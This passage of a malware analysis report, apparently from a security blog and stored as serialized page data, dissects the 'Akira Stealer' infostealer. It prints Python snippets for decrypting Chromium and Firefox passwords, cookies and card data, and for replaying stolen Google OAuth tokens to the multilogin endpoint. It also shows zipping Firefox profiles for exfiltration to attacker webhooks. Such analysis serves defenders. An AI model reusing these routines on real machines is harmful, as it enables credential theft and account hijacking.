",[63,10585,10586],{},"CreditCards/\u003CBrowserName> CreditCards.txt",[186,10588,10590,10591,1289],{"id":10589},"_744-cookie-dumper-chromiumgetcookies","7.4.4 Cookie Dumper (",[63,10592,10593],{},"Chromium.GetCookies",[12,10595,192],{},[12,10597,10598],{},"Cookies, especially session cookies, are prime targets for account hijacking without passwords. This module dumps all cookie files across profiles, decrypts them, and collects essential metadata like domain, name, and expiration. Combined with fingerprinting, these cookies can enable seamless replay attacks on authenticated services.",[56,10600,10602],{"className":8482,"code":10601,"language":8484,"meta":65,"style":65},"results = cursor.execute(\n    \"SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies\"\n).fetchall()\nfor host, name, path, blob, expiry in results:\n    cookie_val = self.Decrypt(blob, encryptionKey)\n    cookies.append((host, name, path, cookie_val, expiry))\n",[63,10603,10604,10608,10613,10617,10622,10627],{"__ignoreMap":65},[102,10605,10606],{"class":104,"line":105},[102,10607,10526],{},[102,10609,10610],{"class":104,"line":111},[102,10611,10612],{},"    \"SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies\"\n",[102,10614,10615],{"class":104,"line":329},[102,10616,10536],{},[102,10618,10619],{"class":104,"line":346},[102,10620,10621],{},"for host, name, path, blob, expiry in results:\n",[102,10623,10624],{"class":104,"line":650},[102,10625,10626],{},"    cookie_val = self.Decrypt(blob, encryptionKey)\n",[102,10628,10629],{"class":104,"line":656},[102,10630,10631],{},"    cookies.append((host, name, path, cookie_val, expiry))\n",[1255,10633,10634,10642,10650,10658],{},[1258,10635,10636,10457,10639,10641],{},[251,10637,10638],{},"Scans",[63,10640,10315],{}," SQLite database.",[1258,10643,10644,540,10647,1014],{},[251,10645,10646],{},"Selects",[63,10648,10649],{},"host_key, name, path, encrypted_value, 
expires_utc",[1258,10651,10652,10484,10654,10657],{},[251,10653,10483],{},[63,10655,10656],{},"encrypted_value"," blob to reveal the actual cookie string.",[1258,10659,10660,10663,10664,1014],{},[251,10661,10662],{},"Saves"," into ",[63,10665,10666],{},"Cookies/\u003CBrowserName> Cookies.txt",[186,10668,10670,10671,1289],{"id":10669},"_745-google-session-dumper-chromiumdump_google_sessions","7.4.5 Google Session Dumper (",[63,10672,10673],{},"Chromium.dump_google_sessions",[12,10675,192],{},[12,10677,10678],{},"One of the more advanced components, this routine decrypts stored OAuth tokens from the token_service table. By replaying them via Google’s multilogin endpoint, the malware can regenerate active session cookies—allowing attackers to hijack Google accounts without credentials. This illustrates how access tokens have become prime targets in modern stealers.",[56,10680,10682],{"className":8482,"code":10681,"language":8484,"meta":65,"style":65},"cursor.execute(\"SELECT service, encrypted_token FROM token_service\")\nfor service, blob in cursor.fetchall():\n    iv = blob[3:15]\n    ciphertext = blob[15:-16]\n    cipher = AES.new(secret_key, AES.MODE_GCM, iv)\n    token = cipher.decrypt(ciphertext).decode()\n    # Replays via POST to OAuth endpoint\n    response = requests.post(\n        \"https://accounts.google.com/oauth/multilogin\",\n        headers={\"Authorization\": f\"MultiBearer {token}:{service_id}\"},\n        data={\"source\": \"com.google.Drive\"}\n    )\n    save each account’s cookies to file\n",[63,10683,10684,10689,10694,10699,10704,10709,10714,10719,10724,10729,10734,10739,10743],{"__ignoreMap":65},[102,10685,10686],{"class":104,"line":105},[102,10687,10688],{},"cursor.execute(\"SELECT service, encrypted_token FROM token_service\")\n",[102,10690,10691],{"class":104,"line":111},[102,10692,10693],{},"for service, blob in cursor.fetchall():\n",[102,10695,10696],{"class":104,"line":329},[102,10697,10698],{},"    iv = 
blob[3:15]\n",[102,10700,10701],{"class":104,"line":346},[102,10702,10703],{},"    ciphertext = blob[15:-16]\n",[102,10705,10706],{"class":104,"line":650},[102,10707,10708],{},"    cipher = AES.new(secret_key, AES.MODE_GCM, iv)\n",[102,10710,10711],{"class":104,"line":656},[102,10712,10713],{},"    token = cipher.decrypt(ciphertext).decode()\n",[102,10715,10716],{"class":104,"line":662},[102,10717,10718],{},"    # Replays via POST to OAuth endpoint\n",[102,10720,10721],{"class":104,"line":668},[102,10722,10723],{},"    response = requests.post(\n",[102,10725,10726],{"class":104,"line":674},[102,10727,10728],{},"        \"https://accounts.google.com/oauth/multilogin\",\n",[102,10730,10731],{"class":104,"line":680},[102,10732,10733],{},"        headers={\"Authorization\": f\"MultiBearer {token}:{service_id}\"},\n",[102,10735,10736],{"class":104,"line":9019},[102,10737,10738],{},"        data={\"source\": \"com.google.Drive\"}\n",[102,10740,10741],{"class":104,"line":9025},[102,10742,9950],{},[102,10744,10745],{"class":104,"line":9031},[102,10746,10747],{},"    save each account’s cookies to file\n",[1255,10749,10750,10766,10776,10786],{},[1258,10751,10752,540,10755,10758,10759,10762,10763,10765],{},[251,10753,10754],{},"Fetches",[63,10756,10757],{},"service"," and raw ",[63,10760,10761],{},"encrypted_token"," from ",[63,10764,4601],{}," clone.",[1258,10767,10768,10771,10772,10775],{},[251,10769,10770],{},"AES‑GCM decryption"," using the browser’s ",[63,10773,10774],{},"Local State"," key.",[1258,10777,10778,10781,10782,10785],{},[251,10779,10780],{},"Replays"," decrypted tokens in a POST to Google’s ",[63,10783,10784],{},"multilogin"," API to reconstruct valid OAuth cookies.",[1258,10787,10788,10790,10791,1014],{},[251,10789,10500],{}," per-account session files under ",[63,10792,10793],{},"Cookies/\u003Cdisplay_email> Google Session.txt",[186,10795,10797,10798,1289],{"id":10796},"_746-history-dumper-chromiumgethistory","7.4.6 History Dumper 
(",[63,10799,10800],{},"Chromium.GetHistory",[12,10802,192],{},[12,10804,10805],{},"This function extracts browsing history entries including URL, title, and visit frequency. Beyond privacy invasion, this data helps attackers understand victim behavior, identify high-value targets (e.g., banking portals), or tailor social engineering payloads.",[56,10807,10809],{"className":8482,"code":10808,"language":8484,"meta":65,"style":65},"results = cursor.execute(\n    \"SELECT url, title, visit_count, last_visit_time FROM urls\"\n).fetchall()\nhistory.sort(key=lambda x: x[3], reverse=True)\nreturn [(url, title, count) for url, title, count, _ in history]\n",[63,10810,10811,10815,10820,10824,10829],{"__ignoreMap":65},[102,10812,10813],{"class":104,"line":105},[102,10814,10526],{},[102,10816,10817],{"class":104,"line":111},[102,10818,10819],{},"    \"SELECT url, title, visit_count, last_visit_time FROM urls\"\n",[102,10821,10822],{"class":104,"line":329},[102,10823,10536],{},[102,10825,10826],{"class":104,"line":346},[102,10827,10828],{},"history.sort(key=lambda x: x[3], reverse=True)\n",[102,10830,10831],{"class":104,"line":650},[102,10832,10833],{},"return [(url, title, count) for url, title, count, _ in history]\n",[1255,10835,10836,10847,10857],{},[1258,10837,10838,540,10840,10843,10844,10846],{},[251,10839,10646],{},[63,10841,10842],{},"url, title, visit_count, last_visit_time"," from every ",[63,10845,10367],{}," DB.",[1258,10848,10849,10852,10853,10856],{},[251,10850,10851],{},"Sorts"," entries by ",[63,10854,10855],{},"last_visit_time"," descending.",[1258,10858,10859,540,10861,1014],{},[251,10860,10582],{},[63,10862,10863],{},"History/\u003CBrowserName> History.txt",[186,10865,10867,10868,1289],{"id":10866},"_747-autofill-dumper-chromiumgetautofills","7.4.7 Autofill Dumper (",[63,10869,10870],{},"Chromium.GetAutofills",[12,10872,192],{},[12,10874,10875],{},"Autofill entries—like addresses, names, emails, and sometimes payment-related data—are scraped from the 
browser’s Web Data storage. These values may not seem critical, but when aggregated, they offer a rich profile of the victim’s identity and behavior.",[56,10877,10879],{"className":8482,"code":10878,"language":8484,"meta":65,"style":65},"results = cursor.execute(\n    \"SELECT name, value FROM autofill\"\n).fetchall()\nfor field, value in results:\n    autofills.append((field.strip(), value.strip()))\n",[63,10880,10881,10885,10890,10894,10899],{"__ignoreMap":65},[102,10882,10883],{"class":104,"line":105},[102,10884,10526],{},[102,10886,10887],{"class":104,"line":111},[102,10888,10889],{},"    \"SELECT name, value FROM autofill\"\n",[102,10891,10892],{"class":104,"line":329},[102,10893,10536],{},[102,10895,10896],{"class":104,"line":346},[102,10897,10898],{},"for field, value in results:\n",[102,10900,10901],{"class":104,"line":650},[102,10902,10903],{},"    autofills.append((field.strip(), value.strip()))\n",[1255,10905,10906,10919],{},[1258,10907,10908,10910,10911,10914,10915,10918],{},[251,10909,10754],{}," form-fill entries: ",[63,10912,10913],{},"name, value"," from the ",[63,10916,10917],{},"web data"," file.",[1258,10920,10921,10923,10924,1014],{},[251,10922,10500],{}," out as ",[63,10925,10926],{},"Autofill/\u003CBrowserName> Autofill.txt",[186,10928,10930,10931,10933,10934,1289],{"id":10929},"_748-firefox-profile-grabber-geckodriver-grabfirefoxprofiles","7.4.8 Firefox Profile Grabber (",[63,10932,10241],{}," & ",[63,10935,10936],{},"grabFirefoxProfiles",[12,10938,192],{},[12,10940,10941],{},"Unlike the granular Chromium routines, this function opts for a broad approach: it compresses the entire Firefox profile directory—including saved logins, cookies, and bookmarks—and exfiltrates it wholesale. 
This ensures attackers can analyze or extract data offline, bypassing decryption hurdles with known NSS tooling.",[56,10943,10945],{"className":8482,"code":10944,"language":8484,"meta":65,"style":65},"with zipfile.ZipFile(zip_path, 'w') as zipf:\n    for root, dirs, files in os.walk(source_path):\n        zipf.write(each file)\n# Upload via GoFile/File.io, then POST via attacker webhooks\n",[63,10946,10947,10952,10957,10962],{"__ignoreMap":65},[102,10948,10949],{"class":104,"line":105},[102,10950,10951],{},"with zipfile.ZipFile(zip_path, 'w') as zipf:\n",[102,10953,10954],{"class":104,"line":111},[102,10955,10956],{},"    for root, dirs, files in os.walk(source_path):\n",[102,10958,10959],{"class":104,"line":329},[102,10960,10961],{},"        zipf.write(each file)\n",[102,10963,10964],{"class":104,"line":346},[102,10965,10966],{},"# Upload via GoFile/File.io, then POST via attacker webhooks\n",[1255,10968,10969,10979,10989],{},[1258,10970,10971,10974,10975,10978],{},[251,10972,10973],{},"Zips"," the entire ",[63,10976,10977],{},"%APPDATA%\\Mozilla\\Firefox\\Profiles"," directory.",[1258,10980,10981,10984,10985,10988],{},[251,10982,10983],{},"Names"," it ",[63,10986,10987],{},"%TEMP%\\\u003CComputerName>_Firefox_profiles.zip"," and sends the download link over the same webhook channels.",[1258,10990,10991,10994,10995,805,10998,805,11001,11004],{},[251,10992,10993],{},"Also"," invokes the same SQLite-based extraction functions (",[63,10996,10997],{},"logins.json",[63,10999,11000],{},"cookies.sqlite",[63,11002,11003],{},"places.sqlite",") against each Firefox profile using the NSS decryption routines already present.",[186,11006,11008],{"id":11007},"_749-extraction-summary","7.4.9 Extraction Summary",[12,11010,192],{},[12,11012,11013,11014,805,11016,805,11018,805,11020,6190,11022,11025,11026,11029,11030,11032,11033,805,11035,6190,11037,11039,11040,11043],{},"Astor.py orchestrates a comprehensive browser compromise by systematically harvesting every credential and 
session artifact across Chromium-based and Firefox clients. It locates and safely copies each SQLite store—",[63,11015,4597],{},[63,11017,4601],{},[63,11019,10315],{},[63,11021,10367],{},[63,11023,11024],{},"autofill","—then runs targeted SQL queries to extract URLs, usernames, passwords, credit-card details, cookies, browsing history, and form-fill entries. Passwords and payment data are decrypted via AES-GCM (or Windows DPAPI fallback), while cookies are similarly unwrapped to reveal their plaintext values. For Google accounts, encrypted OAuth tokens from ",[63,11027,11028],{},"token_service"," are decrypted and replayed against the ",[63,11031,10784],{}," API to regenerate live session cookies. Finally, Firefox profiles are archived wholesale (including ",[63,11034,10997],{},[63,11036,11000],{},[63,11038,11003],{},") and delivered as ZIPs, ensuring no artifact is left behind. This end-to-end pipeline runs silently under ",[63,11041,11042],{},"%TEMP%\\\u003CComputerName>",", producing neatly organized output files for every data category.",[41,11045,11047],{"id":11046},"_75-decryption-logic","7.5 Decryption Logic",[12,11049,47],{},[12,11051,11052],{},"Modern browsers like Chrome and Edge encrypt sensitive data—such as passwords, cookies, and credit card details—before storing them locally. Akira includes built-in decryption routines tailored to handle both legacy and current Chromium encryption methods. This ensures it can extract cleartext data regardless of the system's patch level or browser version.",[12,11054,11055],{},"At the core of this process is the extraction and decryption of the browser’s master encryption key, stored in a file called Local State. 
Depending on the browser version and Windows build, Akira dynamically selects the appropriate decryption method:",[12,11057,11058],{},"DPAPI (Data Protection API) is used on older systems, where Chrome stores secrets protected by the current user's Windows credentials.",[12,11060,11061],{},"AES-GCM is used on modern Chromium builds, where a randomly generated master key is itself encrypted with DPAPI, then used for in-app encryption of user data.",[12,11063,11064],{},"By first decrypting the Local State master key, Akira gains the ability to unlock all browser secrets—paving the way for extracting credentials, tokens, cookies, and more.",[12,11066,11067],{},[251,11068,11069],{},"Key extraction",[56,11071,11073],{"className":8482,"code":11072,"language":8484,"meta":65,"style":65},"local_state_path = os.path.join(user_path, \"Local State\")\nwith open(local_state_path, \"r\", encoding=\"utf-8\") as f:\n    local_state = json.load(f)\nmaster_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n",[63,11074,11075,11080,11085,11090],{"__ignoreMap":65},[102,11076,11077],{"class":104,"line":105},[102,11078,11079],{},"local_state_path = os.path.join(user_path, \"Local State\")\n",[102,11081,11082],{"class":104,"line":111},[102,11083,11084],{},"with open(local_state_path, \"r\", encoding=\"utf-8\") as f:\n",[102,11086,11087],{"class":104,"line":329},[102,11088,11089],{},"    local_state = json.load(f)\n",[102,11091,11092],{"class":104,"line":346},[102,11093,11094],{},"master_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n",[12,11096,11097],{},[251,11098,11099],{},"Decryption (AES-GCM):",[56,11101,11103],{"className":8482,"code":11102,"language":8484,"meta":65,"style":65},"nonce = value[3:15]\nciphertext = value[15:-16]\ntag = value[-16:]\ncipher = AES.new(aes_key, AES.MODE_GCM, nonce=nonce)\ndecrypted = cipher.decrypt_and_verify(ciphertext, 
tag)\n",[63,11104,11105,11110,11115,11120,11125],{"__ignoreMap":65},[102,11106,11107],{"class":104,"line":105},[102,11108,11109],{},"nonce = value[3:15]\n",[102,11111,11112],{"class":104,"line":111},[102,11113,11114],{},"ciphertext = value[15:-16]\n",[102,11116,11117],{"class":104,"line":329},[102,11118,11119],{},"tag = value[-16:]\n",[102,11121,11122],{"class":104,"line":346},[102,11123,11124],{},"cipher = AES.new(aes_key, AES.MODE_GCM, nonce=nonce)\n",[102,11126,11127],{"class":104,"line":650},[102,11128,11129],{},"decrypted = cipher.decrypt_and_verify(ciphertext, tag)\n",[12,11131,11132,11133,1014],{},"If fallback to DPAPI is needed (on older systems), it uses ",[63,11134,11135],{},"win32crypt.CryptUnprotectData()",[12,11137,11138,11144],{},[251,11139,11140,11141,1551],{},"Explanation of ",[63,11142,11143],{},"decrypt_password_blob","\nThis function demonstrates how Akira Stealer decrypts each saved password value from Chromium-based browsers. It handles two cases:",[6086,11146,11147,11157],{},[1258,11148,11149,11152,11153,11156],{},[251,11150,11151],{},"Windows DPAPI blobs"," (older or non-GCM encrypted data): Falls back to the system call ",[63,11154,11155],{},"CryptUnprotectData",", which uses the user’s Windows credentials to decrypt.",[1258,11158,11159,11162,11163,11166],{},[251,11160,11161],{},"AES-GCM encrypted blobs"," (Chrome v10/v11 format): Parses the version header, extracts the IV and authentication tag, and uses the ",[63,11164,11165],{},"cryptography"," library to decrypt the payload securely.",[56,11168,11170],{"className":8482,"code":11169,"language":8484,"meta":65,"style":65},"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.backends import default_backend\n\n\ndef decrypt_password_blob(buffer: bytes, key: bytes) -> str:\n    \"\"\"\n    Decrypts a Chrome password blob using either DPAPI or AES-GCM.\n\n    Parameters:\n    - buffer: raw encrypted blob from the `password_value` field\n    - 
key: the master AES key retrieved via DPAPI from Local State\n\n    Returns:\n    - Decrypted UTF-8 plaintext password\n    \"\"\"\n    # 1) DPAPI fallback for non-AES-GCM blobs\n    if not buffer.startswith((b'v10', b'v11')):\n        # Uses Windows CryptUnprotectData under the hood\n        return CryptUnprotectData(buffer)\n\n    # 2) AES-GCM decryption for Chrome v10/v11 format:\n    # Bytes layout:\n    # [0:3]    = version header ('v10'/'v11')\n    # [3:15]   = initialization vector (IV)\n    # [15:-16] = ciphertext payload\n    # [-16:]   = GCM authentication tag\n    iv = buffer[3:15]\n    ciphertext = buffer[15:-16]\n    tag = buffer[-16:]\n\n    # Initialize AES-GCM cipher with extracted IV and tag\n    cipher = Cipher(\n        algorithms.AES(key),\n        modes.GCM(iv, tag),\n        backend=default_backend()\n    )\n    decryptor = cipher.decryptor()\n\n    # Perform decryption; raises if authentication fails\n    plaintext = decryptor.update(ciphertext) + decryptor.finalize()\n\n    # Decode to UTF-8, ignoring any stray errors\n    return plaintext.decode('utf-8', errors='ignore')\n",[63,11171,11172,11177,11182,11186,11190,11195,11199,11204,11208,11213,11218,11223,11227,11232,11237,11241,11246,11251,11256,11261,11265,11270,11275,11280,11285,11290,11295,11300,11305,11310,11314,11319,11324,11329,11334,11339,11343,11348,11352,11357,11362,11366,11371],{"__ignoreMap":65},[102,11173,11174],{"class":104,"line":105},[102,11175,11176],{},"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\n",[102,11178,11179],{"class":104,"line":111},[102,11180,11181],{},"from cryptography.hazmat.backends import default_backend\n",[102,11183,11184],{"class":104,"line":329},[102,11185,7846],{"emptyLinePlaceholder":2180},[102,11187,11188],{"class":104,"line":346},[102,11189,7846],{"emptyLinePlaceholder":2180},[102,11191,11192],{"class":104,"line":650},[102,11193,11194],{},"def decrypt_password_blob(buffer: bytes, key: bytes) -> 
str:\n",[102,11196,11197],{"class":104,"line":656},[102,11198,9824],{},[102,11200,11201],{"class":104,"line":662},[102,11202,11203],{},"    Decrypts a Chrome password blob using either DPAPI or AES-GCM.\n",[102,11205,11206],{"class":104,"line":668},[102,11207,7846],{"emptyLinePlaceholder":2180},[102,11209,11210],{"class":104,"line":674},[102,11211,11212],{},"    Parameters:\n",[102,11214,11215],{"class":104,"line":680},[102,11216,11217],{},"    - buffer: raw encrypted blob from the `password_value` field\n",[102,11219,11220],{"class":104,"line":9019},[102,11221,11222],{},"    - key: the master AES key retrieved via DPAPI from Local State\n",[102,11224,11225],{"class":104,"line":9025},[102,11226,7846],{"emptyLinePlaceholder":2180},[102,11228,11229],{"class":104,"line":9031},[102,11230,11231],{},"    Returns:\n",[102,11233,11234],{"class":104,"line":9037},[102,11235,11236],{},"    - Decrypted UTF-8 plaintext password\n",[102,11238,11239],{"class":104,"line":9043},[102,11240,9824],{},[102,11242,11243],{"class":104,"line":9049},[102,11244,11245],{},"    # 1) DPAPI fallback for non-AES-GCM blobs\n",[102,11247,11248],{"class":104,"line":9055},[102,11249,11250],{},"    if not buffer.startswith((b'v10', b'v11')):\n",[102,11252,11253],{"class":104,"line":9061},[102,11254,11255],{},"        # Uses Windows CryptUnprotectData under the hood\n",[102,11257,11258],{"class":104,"line":9067},[102,11259,11260],{},"        return CryptUnprotectData(buffer)\n",[102,11262,11263],{"class":104,"line":9073},[102,11264,7846],{"emptyLinePlaceholder":2180},[102,11266,11267],{"class":104,"line":9079},[102,11268,11269],{},"    # 2) AES-GCM decryption for Chrome v10/v11 format:\n",[102,11271,11272],{"class":104,"line":9085},[102,11273,11274],{},"    # Bytes layout:\n",[102,11276,11277],{"class":104,"line":9091},[102,11278,11279],{},"    # [0:3]    = version header ('v10'/'v11')\n",[102,11281,11282],{"class":104,"line":9097},[102,11283,11284],{},"    # [3:15]   = initialization vector 
(IV)\n",[102,11286,11287],{"class":104,"line":9103},[102,11288,11289],{},"    # [15:-16] = ciphertext payload\n",[102,11291,11292],{"class":104,"line":9770},[102,11293,11294],{},"    # [-16:]   = GCM authentication tag\n",[102,11296,11297],{"class":104,"line":9775},[102,11298,11299],{},"    iv = buffer[3:15]\n",[102,11301,11302],{"class":104,"line":9780},[102,11303,11304],{},"    ciphertext = buffer[15:-16]\n",[102,11306,11307],{"class":104,"line":9785},[102,11308,11309],{},"    tag = buffer[-16:]\n",[102,11311,11312],{"class":104,"line":9791},[102,11313,7846],{"emptyLinePlaceholder":2180},[102,11315,11316],{"class":104,"line":9796},[102,11317,11318],{},"    # Initialize AES-GCM cipher with extracted IV and tag\n",[102,11320,11321],{"class":104,"line":9801},[102,11322,11323],{},"    cipher = Cipher(\n",[102,11325,11326],{"class":104,"line":9806},[102,11327,11328],{},"        algorithms.AES(key),\n",[102,11330,11331],{"class":104,"line":9811},[102,11332,11333],{},"        modes.GCM(iv, tag),\n",[102,11335,11336],{"class":104,"line":9816},[102,11337,11338],{},"        backend=default_backend()\n",[102,11340,11341],{"class":104,"line":9821},[102,11342,9950],{},[102,11344,11345],{"class":104,"line":9827},[102,11346,11347],{},"    decryptor = cipher.decryptor()\n",[102,11349,11350],{"class":104,"line":9833},[102,11351,7846],{"emptyLinePlaceholder":2180},[102,11353,11354],{"class":104,"line":9839},[102,11355,11356],{},"    # Perform decryption; raises if authentication fails\n",[102,11358,11359],{"class":104,"line":9844},[102,11360,11361],{},"    plaintext = decryptor.update(ciphertext) + decryptor.finalize()\n",[102,11363,11364],{"class":104,"line":9849},[102,11365,7846],{"emptyLinePlaceholder":2180},[102,11367,11368],{"class":104,"line":9854},[102,11369,11370],{},"    # Decode to UTF-8, ignoring any stray errors\n",[102,11372,11373],{"class":104,"line":9859},[102,11374,11375],{},"    return plaintext.decode('utf-8', 
errors='ignore')\n",[41,11377,11379],{"id":11378},"_76-session-token-hijacking","7.6 Session Token Hijacking",[12,11381,47],{},[12,11383,11384,11385,11388],{},"Akira doesn’t stop at passive data collection—it actively hijacks live session tokens to impersonate victims in real time. After extracting encrypted tokens from browser storage, it reconstructs the required authorization header and replays a ",[251,11386,11387],{},"MultiLogin"," request against Google’s OAuth endpoint. The code snippet below illustrates this process:",[56,11390,11392],{"className":8482,"code":11391,"language":8484,"meta":65,"style":65},"# Build SAPISIDHASH header for Google services\norigin = \"https://accounts.google.com\"\ntimestamp = int(time.time())\n# Compute SHA1 of \"timestamp origin SAPISID\"\npayload = f\"{timestamp} {origin} {sap_id_cookie}\".encode()\nsignature = hashlib.sha1(payload).hexdigest()\nheaders = {\n    \"Authorization\": f\"SAPISIDHASH {timestamp}_{signature}\",\n    \"Content-Type\": \"application/json\"\n}\n# Replay MultiLogin to fetch valid session cookies\nresponse = requests.post(\n    \"https://accounts.google.com/accounts/multilogin\",\n    headers=headers,\n    json={\"continue\": \"https://mail.google.com/\"}\n)\nif response.status_code == 200:\n    # Victim’s cookies now present in response.cookies\n    hijacked_cookies = response.cookies\n",[63,11393,11394,11399,11404,11409,11414,11419,11424,11429,11434,11439,11443,11448,11453,11458,11463,11468,11472,11477,11482],{"__ignoreMap":65},[102,11395,11396],{"class":104,"line":105},[102,11397,11398],{},"# Build SAPISIDHASH header for Google services\n",[102,11400,11401],{"class":104,"line":111},[102,11402,11403],{},"origin = \"https://accounts.google.com\"\n",[102,11405,11406],{"class":104,"line":329},[102,11407,11408],{},"timestamp = int(time.time())\n",[102,11410,11411],{"class":104,"line":346},[102,11412,11413],{},"# Compute SHA1 of \"timestamp origin 
SAPISID\"\n",[102,11415,11416],{"class":104,"line":650},[102,11417,11418],{},"payload = f\"{timestamp} {origin} {sap_id_cookie}\".encode()\n",[102,11420,11421],{"class":104,"line":656},[102,11422,11423],{},"signature = hashlib.sha1(payload).hexdigest()\n",[102,11425,11426],{"class":104,"line":662},[102,11427,11428],{},"headers = {\n",[102,11430,11431],{"class":104,"line":668},[102,11432,11433],{},"    \"Authorization\": f\"SAPISIDHASH {timestamp}_{signature}\",\n",[102,11435,11436],{"class":104,"line":674},[102,11437,11438],{},"    \"Content-Type\": \"application/json\"\n",[102,11440,11441],{"class":104,"line":680},[102,11442,6410],{},[102,11444,11445],{"class":104,"line":9019},[102,11446,11447],{},"# Replay MultiLogin to fetch valid session cookies\n",[102,11449,11450],{"class":104,"line":9025},[102,11451,11452],{},"response = requests.post(\n",[102,11454,11455],{"class":104,"line":9031},[102,11456,11457],{},"    \"https://accounts.google.com/accounts/multilogin\",\n",[102,11459,11460],{"class":104,"line":9037},[102,11461,11462],{},"    headers=headers,\n",[102,11464,11465],{"class":104,"line":9043},[102,11466,11467],{},"    json={\"continue\": \"https://mail.google.com/\"}\n",[102,11469,11470],{"class":104,"line":9049},[102,11471,9238],{},[102,11473,11474],{"class":104,"line":9055},[102,11475,11476],{},"if response.status_code == 200:\n",[102,11478,11479],{"class":104,"line":9061},[102,11480,11481],{},"    # Victim’s cookies now present in response.cookies\n",[102,11483,11484],{"class":104,"line":9067},[102,11485,11486],{},"    hijacked_cookies = response.cookies\n",[12,11488,11489],{},"By replaying this request, Akira can impersonate the user’s Gmail, Drive, or any other Google service protected by a valid session—no credentials required. 
This technique leverages Google’s own token acceptance logic, making it nearly indistinguishable from legitimate client behavior.",[41,11491,11493],{"id":11492},"_77-firefox-decryption","7.7 Firefox Decryption",[12,11495,47],{},[12,11497,11498,11499,11502],{},"Gecko‑based browsers like Firefox encrypt saved credentials and cookies using a master key stored in ",[63,11500,11501],{},"key4.db",". Akira includes a stripped‑down decryption routine mirroring Mozilla’s NSS logic, handling both 3DES and AES‑CBC variants without triggering the master password prompt. Example usage:",[56,11504,11506],{"className":8482,"code":11505,"language":8484,"meta":65,"style":65},"# Load global Salt and encrypted item from key4.db\ndb = sqlite3.connect(profile_path + \"/key4.db\")\ncursor = db.cursor()\ncursor.execute(\"SELECT item1, item2 FROM metadata WHERE id = 'password'\")\nglobal_salt, item2 = cursor.fetchone()\n\n# Decode DER structure and derive key\ndecoded, _ = der_decode(item2)\nentry_salt = decoded[0][1][0].asOctets()\ncipher_text = decoded[1].asOctets()\n# Derive 3DES key\nkey = derive_3des_key(global_salt, master_password, entry_salt)\niv = decoded[0][1][1].asOctets()\n# Decrypt credentials\ncipher = DES3.new(key, DES3.MODE_CBC, iv)\nclear_password = unpad(cipher.decrypt(cipher_text))\n\nprint(\"Decrypted Firefox password:\", clear_password)\n",[63,11507,11508,11513,11518,11523,11528,11533,11537,11542,11547,11552,11557,11562,11567,11572,11577,11582,11587,11591],{"__ignoreMap":65},[102,11509,11510],{"class":104,"line":105},[102,11511,11512],{},"# Load global Salt and encrypted item from key4.db\n",[102,11514,11515],{"class":104,"line":111},[102,11516,11517],{},"db = sqlite3.connect(profile_path + \"/key4.db\")\n",[102,11519,11520],{"class":104,"line":329},[102,11521,11522],{},"cursor = db.cursor()\n",[102,11524,11525],{"class":104,"line":346},[102,11526,11527],{},"cursor.execute(\"SELECT item1, item2 FROM metadata WHERE id = 
'password'\")\n",[102,11529,11530],{"class":104,"line":650},[102,11531,11532],{},"global_salt, item2 = cursor.fetchone()\n",[102,11534,11535],{"class":104,"line":656},[102,11536,7846],{"emptyLinePlaceholder":2180},[102,11538,11539],{"class":104,"line":662},[102,11540,11541],{},"# Decode DER structure and derive key\n",[102,11543,11544],{"class":104,"line":668},[102,11545,11546],{},"decoded, _ = der_decode(item2)\n",[102,11548,11549],{"class":104,"line":674},[102,11550,11551],{},"entry_salt = decoded[0][1][0].asOctets()\n",[102,11553,11554],{"class":104,"line":680},[102,11555,11556],{},"cipher_text = decoded[1].asOctets()\n",[102,11558,11559],{"class":104,"line":9019},[102,11560,11561],{},"# Derive 3DES key\n",[102,11563,11564],{"class":104,"line":9025},[102,11565,11566],{},"key = derive_3des_key(global_salt, master_password, entry_salt)\n",[102,11568,11569],{"class":104,"line":9031},[102,11570,11571],{},"iv = decoded[0][1][1].asOctets()\n",[102,11573,11574],{"class":104,"line":9037},[102,11575,11576],{},"# Decrypt credentials\n",[102,11578,11579],{"class":104,"line":9043},[102,11580,11581],{},"cipher = DES3.new(key, DES3.MODE_CBC, iv)\n",[102,11583,11584],{"class":104,"line":9049},[102,11585,11586],{},"clear_password = unpad(cipher.decrypt(cipher_text))\n",[102,11588,11589],{"class":104,"line":9055},[102,11590,7846],{"emptyLinePlaceholder":2180},[102,11592,11593],{"class":104,"line":9061},[102,11594,11595],{},"print(\"Decrypted Firefox password:\", clear_password)\n",[12,11597,11598,11599,805,11601,6190,11603,11605],{},"With this routine, Akira can transparently dump ",[63,11600,10997],{},[63,11602,11000],{},[63,11604,11003],{}," for each Firefox profile, writing the decrypted output to:",[56,11607,11610],{"className":11608,"code":11609,"language":61},[59],"Passwords/Firefox_\u003CProfileName> Passwords.txt\nCookies/Firefox_\u003CProfileName> Cookies.txt\nHistory/Firefox_\u003CProfileName> History.txt\n",[63,11611,11609],{"__ignoreMap":65},[12,11613,11614],{},"This 
approach sidesteps user-level master password checks, giving the stealer unfettered access to all stored credentials.",[12,11616,11617],{},[251,11618,11619],{},"4. File Structure & Naming",[56,11621,11624],{"className":11622,"code":11623,"language":61,"meta":65},[59],"\u003CComputerName>.zip\n└── \u003CComputerName>\\\n    ├── Passwords\\\n    │   ├── Chrome Passwords.txt\n    │   ├── Edge Passwords.txt\n    │   └── …\n    ├── Cookies\\\n    │   ├── Chrome Cookies.txt\n    │   ├── Edge Cookies.txt\n    │   ├── user@example.com Google Session.txt\n    │   └── …\n    ├── CreditCards\\\n    │   ├── Chrome CreditCards.txt\n    │   └── …\n    ├── History\\\n    │   ├── Chrome History.txt\n    │   └── …\n    ├── Autofill\\\n    │   ├── Chrome Autofill.txt\n    │   └── …\n    └── Wallets\\\n        ├── Firefox_Default_profiles.zip\n        ├── Firefox_Profile1_profiles.zip\n        └── …\n",[63,11625,11623],{"__ignoreMap":65},[1255,11627,11628,11642,11648],{},[1258,11629,11630,11631,11634,11635,11638,11639,6051],{},"Each ",[63,11632,11633],{},".txt"," begins with a consistent header (",[63,11636,11637],{},"\u003C================[Akira Stealer v2]>================>",") and separator line (",[63,11640,11641],{},"====…====",[1258,11643,11644,11645,1014],{},"On‑disk ZIP: ",[63,11646,11647],{},"%TEMP%\\\u003CComputerName>.zip",[1258,11649,11650,11651,1014],{},"C&C filename label: 